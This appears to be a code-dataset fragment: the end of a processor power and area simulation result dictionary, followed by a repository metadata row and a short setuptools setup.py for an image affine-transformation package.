'Execution Unit/Integer ALUs/Peak Dynamic': 0.121269,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.10233,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.117377,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00794077,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.090414,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0587269,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.207791,
'Execution Unit/Register Files/Runtime Dynamic': 0.0666677,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215002,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.561929,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.96251,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.12418e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.8525e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.18413e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000843616,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000904625,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000202829,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0564557,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.59106,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.138931,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.191749,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.98386,
'Instruction Fetch Unit/Runtime Dynamic': 0.388242,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0398899,
'L2/Runtime Dynamic': 0.0110088,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.61893,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15718,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0770573,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0770572,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.98281,
'Load Store Unit/Runtime Dynamic': 1.61425,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.19001,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.38002,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0674352,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0680181,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.223279,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0228233,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.49523,
'Memory Management Unit/Runtime Dynamic': 0.0908414,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.1936,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.308764,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.012299,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0906719,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.411735,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.47859,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.144,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.315792,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.828175,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.300609,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.484871,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.244747,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.03023,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.216839,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.67756,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.15646,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0126089,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.143035,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0932505,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.299495,
'Execution Unit/Register Files/Runtime Dynamic': 0.105859,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.337343,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.759655,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.61691,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000561368,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000492564,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000192656,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133955,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00295485,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00525326,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0896441,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.70213,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.185252,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.304472,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.19738,
'Instruction Fetch Unit/Runtime Dynamic': 0.587575,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0331415,
'L2/Runtime Dynamic': 0.00690054,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.74011,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.20486,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0809777,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.1225,
'Load Store Unit/Runtime Dynamic': 1.6852,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.199677,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.399355,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0708661,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0713609,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.354538,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0303777,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.632382,
'Memory Management Unit/Runtime Dynamic': 0.101739,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.2524,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.411575,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0185714,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.145597,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.575743,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.57406,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8525058798762615,
'Runtime Dynamic': 3.8525058798762615,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.210089,
'Runtime Dynamic': 0.065201,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 81.4839,
'Peak Power': 114.596,
'Runtime Dynamic': 18.7807,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.2738,
'Total Cores/Runtime Dynamic': 18.7155,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.210089,
'Total L3s/Runtime Dynamic': 0.065201,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}} | 0 | 0 | 0 |
679bb167edfe58aa3a25e865ce968ba67e0a51de | 405 | py | Python | setup.py | dakshvar22/Image-Transformer | a45e77e733ac1c83634edfd7652651c84beab8ae | [
"MIT"
] | 6 | 2018-03-20T13:01:36.000Z | 2021-02-07T03:09:55.000Z | setup.py | zhangzheng1993/Image-Transformer-1 | a45e77e733ac1c83634edfd7652651c84beab8ae | [
"MIT"
] | null | null | null | setup.py | zhangzheng1993/Image-Transformer-1 | a45e77e733ac1c83634edfd7652651c84beab8ae | [
"MIT"
] | 1 | 2021-02-07T03:09:58.000Z | 2021-02-07T03:09:58.000Z | from setuptools import setup
# Packaging metadata for the imgTransformer distribution.
# zip_safe=False: install unpacked on disk rather than as a zipped egg.
setup(name='imgTransformer',
      version='0.1',
      description='Apply Affine transformations to images and to their corresponding box annotations(optional).',
      url='https://bitbucket.org/aganitha/image-transformer',
      author='Daksh Varshneya',
      author_email='daksh@aganitha.ai',
      license='MIT',
      packages=['imgTransformer'],
      zip_safe=False) | 36.818182 | 113 | 0.698765 | from setuptools import setup
# Packaging metadata for the imgTransformer distribution.
# zip_safe=False: install unpacked on disk rather than as a zipped egg.
setup(name='imgTransformer',
      version='0.1',
      description='Apply Affine transformations to images and to their corresponding box annotations(optional).',
